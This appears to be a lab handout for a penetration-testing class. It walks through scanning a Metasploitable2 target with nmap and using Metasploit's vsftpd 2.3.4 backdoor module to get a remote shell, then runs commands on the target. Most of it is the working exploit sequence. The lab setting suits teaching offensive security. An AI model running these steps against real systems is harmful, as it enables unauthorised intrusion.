1. Start Kali Linux machine and Metasploitable2 Linux machine
2. Login to Metasploitable Linux Target machine with
Username – msfadmin
Password- msfadmin
Now open Terminal and type ifconfig command to get an IP address of Target
$ifconfig
Ex. IP Address is 192.168.1.6
3. On Kali Linux – open Exploitation Tools -🡪 metasploit framework
Type password :kali
4. On Kali Linux
$nmap [ To know available options]
5. Run SYN scan on target machine from Kali
$sudo nmap –sS -sV -O 192.168.1.6
Click to msfconsole
msf6>search vsftpd 2.3.4
>use exploit/unix/ftp/vsftpd_234_backdoor
>show payloads
>show options
>set rhosts 192.168.1.6
>show options
>run
hostname
ifconfig
mkdir /AIT100
ls /
Now we can run commands directly on target machine from our Kali Linux terminal like ls ,
hostname , ifconfig